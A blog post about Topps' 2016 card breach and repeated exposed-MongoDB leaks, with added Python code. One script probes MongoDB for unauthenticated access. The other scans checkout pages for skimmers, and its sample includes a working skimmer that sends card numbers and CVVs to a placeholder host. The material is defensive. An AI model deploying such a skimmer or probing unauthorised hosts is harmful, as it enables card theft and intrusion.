A number of sites have now reported on Topps’ recent disclosure that on October 12, it became aware of unauthorized access to payment card information for customers using the topps.com website between July 30 and October 12.
A copy of the sports card and memorabilia giant’s notification can be found on several state regulators’ sites but not, it seems, on Topps’ own site, nor is it mentioned in their tweets. The notification says that compromised data may have included customers’ names, addresses, email addresses, phone numbers, credit and debit card numbers, card expiration dates, and card verification numbers. The number of customers potentially affected was not disclosed.
Once Topps became aware of the situation, they brought in a security firm and worked with that firm and their site development and hosting companies. “We stopped the incident and continue to work with our security firm to help prevent a similar incident from happening again,” the company claims in its notification.
To those who do not regularly follow breach reports, the Topps report may sound like just another disclosure of an e-commerce site getting compromised. It’s happened to so many others, too, right? As David Hill wrote on Fansided about Topps’ incident response:
While this may seem like locking the barn door after the proverbial horse was stolen, it is a hazard of anyone making online purchases. The biggest online retailers all have the same issues. And even with the best security that is out there, hackers and other criminals that are looking to access financial information can find a way to get what they want. Every company has the same concerns.
Topps may have had a possible data breach, but that does not affect our confidence in the company. I know that I’ll certainly be making purchases there going forward, trusting that they have fixed those issues.
David’s more trusting than I am. Why were full track data being stored, and without encryption? [Update: as “Gamma” points out in comments, it is likely that the data were captured during transmission and not from storage.] And would it affect his confidence if he knew that this wasn’t their first data security incident this year?
Other Data Security Incidents
In June, 2016, this site reported on a data leak involving Topps’ apps. The leak had been uncovered by Chris Vickery of the MacKeeper Security Research Center. After he turned to DataBreaches.net for assistance in getting a response from Topps, this site reported on June 24:
The exposed database was not the first time MacKeeper security researcher Chris Vickery had seen Topps mobile app fan data leaking. In early December, Vickery reports, he stumbled upon three separate, publicly accessible databases containing what, on quick inspection, appeared to be hundreds of thousands of user account details for Bunt, Huddle, and Kick fans. A few days later, and without any intervention from Vickery, the databases were secured. Vickery never found out whether those were Topps’ databases or some contractor’s databases, but because they were secured, he reasonably turned his attention to other databases that were still exposed.
Several weeks ago, however, Vickery discovered another exposed and publicly accessible database. This database, hosted on Amazon, contained all three apps’ fans’ data. As with so many other exposed databases, Vickery noted that it was a MongoDB installation that was open on port 27017.
As the post went on to explain, DataBreaches.net assisted Vickery in getting Topps notified so that they could secure customer data. Those data did not include payment card data, but did include hundreds of thousands of fans’ profiles with their usernames and dates of birth, as well as details of their trades and activity. Topps’ investigation attributed the leak to a contractor error.
So by June 24, there had been two incidents of exposed data: one discovered in December, 2015 and another discovered in June, 2016. Now we learn that beginning July 30, roughly five weeks after Topps had been alerted to the second leak, customer payment card data was being accessed or acquired. Did Topps bring in any security firm back in June to really assess their security system-wide? Could the payment card data compromise have been prevented or detected earlier?
“But wait, there’s more!” as some ads claim. In September, Vickery had to contact Topps yet again over yet another data leak. Although it was not publicly revealed at the time, on September 13, Vickery informed DataBreaches.net that he had sent another notification to Topps concerning another Amazon-hosted database that was leaking because its MongoDB installation was reachable from the internet on port 27017.
“There aren’t hashed passwords or other very sensitive pieces of data exposed here, but it does have lots of spreadsheets with fields like username, email address, date of birth, and a few other bits related to the user’s Topps account,” Vickery wrote to them in September. Vickery also noted that there were many files exposed, with just one file alone exposing details on over 392,000 VIP Kick fans.
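The June and September leaks are the same misconfiguration: a MongoDB instance reachable from the internet on its default port 27017 with no access control, so any client can list and dump its databases. The following is an added example, not code from DataBreaches.net, Topps or Chris Vickery, of how a practitioner checks a host for that condition: send `listDatabases` with no credentials over the legacy OP_QUERY wire format and see whether the server answers or refuses. It uses only the standard library, so no driver is needed. The sample replies it is tested against are constructed here; OP_QUERY is the protocol a 2016-era mongod spoke, while MongoDB 5.1 and later accept it only for the handshake, so a current server would need OP_MSG instead.

```python
"""Probe a MongoDB listener for the exposure described above: a mongod bound
to a public interface with no authorization, answering listDatabases to anyone.
Added example (not DataBreaches.net, Topps or MacKeeper code); sample replies
below are constructed."""
import socket
import struct

OP_REPLY = 1
OP_QUERY = 2004


# --- minimal BSON encoders: just enough for the command and for sample replies ---
def bson_int32(key, value):
    return b"\x10" + key.encode() + b"\x00" + struct.pack("<i", value)


def bson_string(key, value):
    raw = value.encode() + b"\x00"
    return b"\x02" + key.encode() + b"\x00" + struct.pack("<i", len(raw)) + raw


def bson_doc(elements):
    """Document = int32 total length + elements + 0x00 terminator."""
    return struct.pack("<i", len(elements) + 5) + elements + b"\x00"


def bson_array_of_docs(key, docs):
    """Array of embedded documents; BSON arrays are documents keyed "0", "1", ..."""
    items = b"".join(b"\x03" + str(i).encode() + b"\x00" + d for i, d in enumerate(docs))
    return b"\x04" + key.encode() + b"\x00" + bson_doc(items)


# --- wire protocol ---
def build_op_query(request_id, collection, command_doc):
    """OP_QUERY body: flags, full collection name, numberToSkip, numberToReturn, query."""
    body = (struct.pack("<i", 0) + collection.encode() + b"\x00"
            + struct.pack("<ii", 0, -1) + command_doc)
    header = struct.pack("<iiii", 16 + len(body), request_id, 0, OP_QUERY)
    return header + body


def build_op_reply(request_id, docs, response_to=0):
    """OP_REPLY as a server would send it; used here to construct sample replies."""
    body = struct.pack("<iqii", 0, 0, 0, len(docs)) + b"".join(docs)
    return struct.pack("<iiii", 16 + len(body), request_id, response_to, OP_REPLY) + body


def parse_header(msg):
    """(messageLength, requestID, responseTo, opCode) from the 16-byte MsgHeader."""
    return struct.unpack_from("<iiii", msg, 0)


LIST_DATABASES = bson_doc(bson_int32("listDatabases", 1))


def classify_reply(reply):
    """'exposed' if listDatabases was answered without credentials,
    'auth-required' if the server refused with Unauthorized, else 'unknown'."""
    if len(reply) < 36:
        return "malformed"
    length, _, _, opcode = parse_header(reply)
    if opcode != OP_REPLY or length != len(reply):
        return "malformed"
    _flags, _cursor_id, _start, nreturned = struct.unpack_from("<iqii", reply, 16)
    if nreturned < 1:
        return "malformed"
    doc_len = struct.unpack_from("<i", reply, 36)[0]
    doc = reply[36:36 + doc_len]
    # Check the refusal first: its errmsg echoes the command name.
    if b"Unauthorized\x00" in doc or b"not authorized" in doc:
        return "auth-required"
    if b"databases\x00" in doc:          # the "databases" key of a real answer
        return "exposed"
    return "unknown"


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-message")
        buf += chunk
    return buf


def probe(host, port=27017, timeout=5.0):
    """Send listDatabases to admin.$cmd and classify the answer.
    Only run this against hosts you are authorised to test."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_op_query(1, "admin.$cmd", LIST_DATABASES))
        head = _recv_exact(sock, 16)
        total = parse_header(head)[0]
        return classify_reply(head + _recv_exact(sock, total - 16))


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]) if len(sys.argv) > 1 else "usage: probe.py <host>")
```

A server that returns the database list here is exposed exactly as Vickery found these were. The fix is not a password alone: restrict `net.bindIp` in mongod.conf to internal addresses, set `security.authorization: enabled`, and firewall 27017 from the internet, then re-run the probe from outside to confirm.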
So in December of 2015 there was a data leak; in June they learned of another and addressed it; and in September they were notified of yet more leakage and addressed that. But where and when was the comprehensive, system-wide security review by an outside firm that might have prevented or detected the payment card compromise that began only weeks after they had been alerted to another security concern?
Three fan user data leaks and a payment card breach within one year. David Hill might be confident about using the Topps site, but how many strikes until you’re out?
“Why were full track data being stored, and without encryption?”
Dissent
Credit cards are getting stolen on the go; they are being skimmed/grabbed/scraped, or whatever you want to call it, in real time. When you go to the hacked eCommerce site and enter your cc number, exp date, cvv and other data, it all goes to the hacker, because there is a malicious script installed which is specifically designed to grab credit card data.
Look at these research and news articles:
https://gwillem.gitlab.io/2016/10/11/5900-online-stores-found-skimming/
http://www.theregister.co.uk/2016/10/13/hackers_pop_6000_sites_on_active_18month_carding_bonanza/
https://blog.sucuri.net/2015/06/magento-platform-targeted-by-credit-card-scrapers.html
https://blog.sucuri.net/2016/06/magento-credit-card-stealer-braintree-extension.html
Krebs also summarized it pretty nicely:
https://krebsonsecurity.com/2016/04/all-about-fraud-how-crooks-get-the-cvv/
I suspect you’re correct, but I read their notification a few times, and it doesn’t actually say that the data were captured during the transactions, does it? From the way they worded it, it could have been a hack of stored data. But I probably should have assumed it was during transmission, as that’s the usual scenario.
Well…you’re not allowed to store CVVs, so if the data wasn’t being grabbed during transmission/auth, then they were breaching PCI, right?
Right.
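The in-transit skimming that Gamma’s comment describes is a script injected into the checkout page that reads the card fields as the form is submitted and beacons them to a host the attacker controls. As an added example (not part of the original post or of any comment, and not code from the linked research), here is the first-pass check a practitioner runs on a checkout page’s HTML: flag external scripts loaded from hosts outside an allowlist, and flag inline scripts that both touch card fields and contain a network-send primitive aimed at a host outside that allowlist. The page, the host names (`.example` placeholders) and the allowlist are constructed for this example. Real skimmers are usually obfuscated, so a clean result means “nothing obvious”, not “clean”; the reliable check is diffing the deployed code against the known-good release.

```python
"""Heuristic scan of a checkout page for a card-skimming script.
Added example; the HTML, hosts and allowlist below are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Identifiers a skimmer has to touch, and the primitives it can send with.
CARD_FIELD_RE = re.compile(r"(cc[_-]?num|card[_-]?num|cvv|cvc|expir|security[_-]?code)", re.I)
EXFIL_RE = re.compile(r"(XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\s*\(|\.src\s*=|WebSocket)")
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+", re.I)


class _ScriptCollector(HTMLParser):
    """Collect <script src=...> URLs and the bodies of inline <script> blocks."""
    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def scan_checkout_page(html, allowed_hosts):
    """Return (kind, host, detail) findings; external-script findings come first."""
    allowed = {h.lower() for h in allowed_hosts}
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    findings = []
    for src in p.external:
        host = urlparse(src).netloc.lower()      # "" for same-origin relative paths
        if host and host not in allowed:
            findings.append(("external-script", host, src))
    for body in p.inline:
        if not (CARD_FIELD_RE.search(body) and EXFIL_RE.search(body)):
            continue
        hosts = {urlparse(u).netloc.lower() for u in URL_RE.findall(body)}
        foreign = sorted(h for h in hosts if h not in allowed)
        if foreign:
            findings.append(("inline-skimmer", foreign[0], body.strip()[:80]))
        elif not hosts:   # reads card fields and sends, but hides its target: likely obfuscated
            findings.append(("inline-suspicious", "", body.strip()[:80]))
    return findings


# Constructed sample: the shop's own hosts are allowed, an unknown tag was added to
# <head>, and a skimmer was appended after the form (all hosts are .example placeholders).
ALLOWED_HOSTS = {"cdn.shop.example", "js.payments-gateway.example"}
SAMPLE_CHECKOUT_HTML = """<html><head>
<script src="/js/checkout.js"></script>
<script src="https://js.payments-gateway.example/client.js"></script>
<script src="//cdn.shop.example/static/app.js"></script>
<script src="https://cdn-analytics.example/tag.js"></script>
</head><body>
<form id="checkout"><input name="cc_number"><input name="cvv"><input name="expiry"></form>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>
document.getElementById('checkout').addEventListener('submit', function () {
  var d = {n: document.querySelector('[name=cc_number]').value,
           c: document.querySelector('[name=cvv]').value};
  new Image().src = 'https://stats-collector.example/i.gif?d=' + btoa(JSON.stringify(d));
});
</script></body></html>"""

if __name__ == "__main__":
    for kind, host, detail in scan_checkout_page(SAMPLE_CHECKOUT_HTML, ALLOWED_HOSTS):
        print(f"{kind:18} {host:28} {detail}")
```

On the sample page this reports the unknown `cdn-analytics.example` tag and the inline skimmer beaconing to `stats-collector.example`. The same allowlist is what a `Content-Security-Policy` with `script-src` and `connect-src` (plus `img-src`, since this skimmer exfiltrates through an image request) would enforce in the browser, which is the control that stops the data leaving even when the injection is missed.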